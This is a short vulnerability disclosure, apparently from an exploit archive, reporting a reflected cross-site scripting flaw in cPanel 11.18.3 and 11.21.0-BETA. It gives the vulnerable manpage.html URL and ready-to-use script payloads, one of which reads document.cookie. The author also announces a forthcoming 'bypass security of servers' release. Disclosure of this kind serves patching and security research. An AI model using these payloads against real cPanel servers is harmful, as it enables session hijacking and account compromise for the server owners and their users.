It appears that cPanel versions 11.18.3 and 11.21.0-BETA suffer from a cross site scripting vulnerability.
7f3198f690b55aec0aade4f51d6cccb9fade7b3a445b76146f92f7456c589c04
Hello
I Discovered a new bug in cPanel ( xss )
Exploit :
http://example.com:2082/frontend/x/manpage.html?[XSS]
Example :
1-
http://example.com:2082/frontend/x/manpage.html?<script>alert(LeZr)</script>
2-
http://example.com:2082/frontend/x/manpage.html?<script>alert(document.cookie)</script>
tested on:
cPanel V 11.18.3
cPanel V 11.21.0-BETA
Discovered By Linux_Drox
Soon : Bypass Security of servers On cPanel 11.x
www.LeZr.Com
S-H-T